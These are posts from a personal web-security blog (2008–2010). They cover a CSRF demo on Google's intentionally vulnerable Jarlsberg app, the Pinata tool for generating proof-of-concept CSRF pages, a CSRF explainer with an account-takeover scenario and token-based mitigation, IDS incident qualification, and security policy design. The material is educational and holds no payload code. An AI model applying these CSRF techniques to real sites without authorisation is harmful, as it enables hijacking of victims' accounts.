Tuesday, May 11, 2010

CSRF Demo Video

This is a short demo video of how CSRF attack works. I am using google's jarlsberg for this demo - Always get permission before performing any attacks.

The jarlsberg application "Add Snippet" functionality is vulnerable to CSRF. I am using simple img tags to add messages to the application - this is actually mimicking an attack where by an attacker can add messages on behalf of the victim.

I am simulating that the user while logged into the jarlsberg application is tricked into clicking a link(this particular link is a web server running on my local machine). I then demonstrate through a proxy what happens to the traffic - you will note that the initial request is to localhost but when the img tag is read it loads the vulnerable URL, the browser then automatically appends the correct cookies to the request. You can use pinata to generate the CSRF code here - though this instance uses GET method, Pinata is much more useful when generating POST and multipart POST requests.

If you are interested in Pinata you can find it here - http://code.google.com/p/pinata-csrf-tool/


Wednesday, March 31, 2010

Pinata - A CSRF POC HTML Generation tool.

After much laziness I have finally completed the CSRF tool. I have named it Pinata.

Overview:

- The tool will generate proof of concept CSRF HTML given an HTTP request. It will automatically check whether it is a GET or a POST request and with further validation for standard POST and Multipart/form POST.
- The tool will then create an HTML corresponding to the type of the request.
- The GET CSRF HTML includes IMG tag with SRC set to the URL being tested.
- The POST CSRF HTML is created with auto submit java script form with names and values from the HTTP request.


Working:

- It is Python based tool. Needs Python installed – I have developed it on Python 2.6 and recommend using that version.
- The tool consists of three files, piñata.py, markup.py and CSRFBody.txt.
- To install it create a new directory like C:\Pinata and copy all three files to it.
- Piñata.py is the main file and should be run to generate the HTML.
- Markup.py is called by piñata.py to generate HTML, I did not develop it and do not take any credit for it - however I would like to thank the developer, it made my life much easier. NOTE:It should not be alerted.
- CSRFBody.txt holds the HTTP request.
- To use the tool go to vulnerable page, create a request, capturing the HTTP request in the proxy. Copy this request and paste it in CSRFBody.txt and then saving and closing CSRFBody.txt
- Run the tool by going to command line and typing C:\Pinata\pinata.py
- It should generate the HTML file in C:\Pinata\


Future Direction

- I look forward to your suggestions.
- Perhaps some features to beat referer header based CSRF protection.
- This is essentially a hack so I will work towards cleaning up the current code.


Questions:

- Let me know if you have any questions or it suddenly stops working for you.

Code:

You can download pinata at the following URL:

http://code.google.com/p/pinata-csrf-tool/

Friday, December 4, 2009

CSRF and XSS Part 1

This is my take on CSRF and XSS.

Web search will find definitions like these:

CSRF : Exploits the website's trust of the user
XSS : Exploits the user's trust of the web application.

What does it actually mean? You will find more explanations but they are all vague. So here is my take on these two, do let me know if they make sense:

CSRF: Cross Site Request Forgery.

Before we actually talk about CSRF let’s talk a little background. Websites track their users by providing them with session ids in the form of cookies, special form fields or or some value in the urls. These uniquely identify each user to the web application, this is important for the following two reasons:

1- HTTP is a state less protocol - meaning each transaction is discreet and complete after which HTTP session is terminated - if unsure use wireshark to capture your HTTP traffic - actually I recommend that you do that. This means that when you request a page and you see "done" or 100 % somewhere on the status bar in your browser, indicating all data was transferred and all HTTP sessions were terminated. Thus there is no way for a web application to keep track of who made what request.
2 - However web applications want to provide you with the content you requested and in the context you requested(to overcome short coming of stateless HTTP). Meaning if you are an anonymous user so don’t get to see the privileged pages, if you are an authenticated user you get to see more and if you are an administrative user you get a lot more. So all this is tied to the session ids or cookies which track you and essentially establishes different levels of trust between you(or your browser) and the web application. Anonymous user no trust, normal authenticated user, some trust and administrative user, complete trust, etc, etc.

For the sake of simplicity I will keep my discussions to cookies as session identifiers. However as I have noted before they are not the only way a website can track user but they are most definitely the most common.

Now on the client side - your browser takes cares of cookie management, making sure that the correct session ids are passed to the correct websites. So that you can surf in peace, harmony and security, browsers work off the same origin policy - meaning if the request is originated from the same browser to a website(domain) for which it has the session id it will automatically append the relevant session cookies.

You want to see it work - for most application without any CSRF protection - if you copy a trusted link and open it another tab or windows of the same browser, it will take you to the original webpage(however this not always true - just an example). I am pretty sure you have done this a few times. If you are in an authenticated section of some website right click a protected link and select open in a new window. When you do this the browser automatically appends all the correct session data to the new window, because the new window has all the correct cookies the web application trusts the new window and displays the content. The web application notes that a browser with all the right session identifiers(cookies) is making a request. It has no way of knowing that the request is coming from two different browser windows (remember HTTP is stateless).


Attack Scenario: An attacker wants to gain access to a users profile. He deems that it can done by changing the users password on a site by first changing the secondary email in the profile tab - this is a very common security feature where by you can request a change of password by following the forgotten password link and entering the alternate email address which is already present in profile, where by receiving an alternate temporary password on the entered email address.

The attacker - who by way goes by the name of Dalek knows that this particular website feature is vulnerable to CSRF. To exploit that, the attacker uses a proxy to capture all the traffic the browser is sending out. Proxies are the first and the most important tool you will need if you thinking of testing web applications, Proxy essentially sits between your browser and the websites - all traffic goes through the proxy to the website and you have the ability to intercept and edit traffic on the fly.

We assume that the attacker also has access to the same website, pretty common - example webmail, social networking sites etc - all users have the same access rights more or less. To generate an actual attack page, the attacker changes his email and sends that request - but instead, catches the request in the proxy. He then looks at the request and I convert the request into an HTML page that would generate the request - fairly straight forward process if you know what you are doing - I wrote a script to do that - more on this later. The attacker then edits the page so as to include the target email.

Dalek - the attacker hosts this page somewhere - inviting a victim by suggesting that they visit the website to get coupons for chocolate covered marzipan. We assume that the victim is logged on to the vulnerable site when she receives this request from the attacker and she being a suckers for good marzipan clicks the evil link.

Since she is logged in to the vulnerable website, on clicking the link the will generate a request to change the email on the users profile. Browser will see that the request is generated for the vulnerable site and since victim - Rose is already logged, will perform this action, by automatically appending all the correct session information to the request and forwarding that request to vulnerable application and that’s about it - she just got CSRFed. So Rose unwilling perfomed an action in her context(websites trust).

Let us revisit the CSRF definition. Exploits the website’s trust of the user. Trust is established through session ids - The application trusts the session ids from the browser and that is how the attack works.

Mitigation - Use unique ephemeral tokens for each sensitive function on your web application.
Cross Site Scripting(XSS) ..... will have to wait for now.

Thursday, July 30, 2009

Incident Qualification through IDS

We run an IPS here at work but only in an sniffer mode. I can see all the exploits flying through to different hosts. Vast majority of these exploits are just run against these hosts without any qualification whether a particular vulnerability affects it. Even if a host is vulnerable it might be that exploit is unsuccessful for whatever reason. This creates a lot of work to go through all the logs and to then to check the host whether there was an incident. I think it would be great if we have post exploit traffic signatures that would qualify whether a particular host was compromised, thus creating an incident. This should not be too difficult, there are only certain things an attacker can do. As soon as IDS sees some traffic stream going outbound to the src after an exploit was executed, it should probaly qualify it as an incident. Need more research in this area perhaps someone else has already thought of it and there is a solution out there.

Update: I am seeing ever more vendors coming up with solutions where the vulnerability system feeds to the IDS.

Sentinel and Snort - and now Qualys and Tipping point.
Perhaps this is the future but it still does not answer my original question - Qualification of incident based on post exploit signatures. Perhaps you do need a SIM or SEIM for that - it is all about correlation.

Friday, October 3, 2008

Security Policies, Procedures, Guidelines and Standards

I have been an avid listener to almost all famous security pod casts and I have more often than not come across the various references to Security Policies and this blog will specifically talk about those. However first I must add that all security pod casters are very knowledgeable and I have great respect for all of them but at times there seem to some sort of confusion when they talk about security policies. Like only today I was listening to this excellent podcast which was very interesting with some great content. But then I found myself contemplating the words of the pod caster. It was being suggested that the security policies were not being updated to include new and emerging technologies like some Web 2.0 systems and other emerging technologies. Though there exists at least couple of philosophies for develop security policies. But my take has always been to keep the security policy as lean as possible like the constitution. Perform risk analysis against your core business and then come up with your security policy to include protection against those risks. Once you have them there shouldn't be a need to update your security policy whenever there is a change of technology. Though I do agree that there might be changes in the business that might change the business's risk profile and hence require a review of the security policy but other than that security policy should remain pretty static. Let me present an example. Say we have a company. One of the ways the company keeps its competitive edge is by keeping taps on whats being developed at its R and D labs. All information is tightly controlled and requires protection against unauthorized disclosure. A good security policy item for such a requirement should be very simple and should read something like:

- Security policy mandates protection against unauthorized release of data.

This one line in a security policy should be enough to cover all current and future technologies and not only that it covers and requires procedures, guidelines and standards in all three areas of control i.e, administrative, physical and technological to ensure compliance with this just one security policy item.

On the other hand procedures, guidelines and standards should continuously be added and updated to include any change in technology. Thus say if your employees start using Web 2.0 technologies to communicate out - you do not have to go back change your security policy to protect against that - actually you don't have to do anything but I will advise against that. My take is even though one doesn't have to do anything in the presence of a good security policy, its always a better to inform and update employees about your company's official stance, using some sort of advisory that refers to the original security policy item. Thus if properly done you will seldom have to go back and change your security policy regardless what technology throws at you.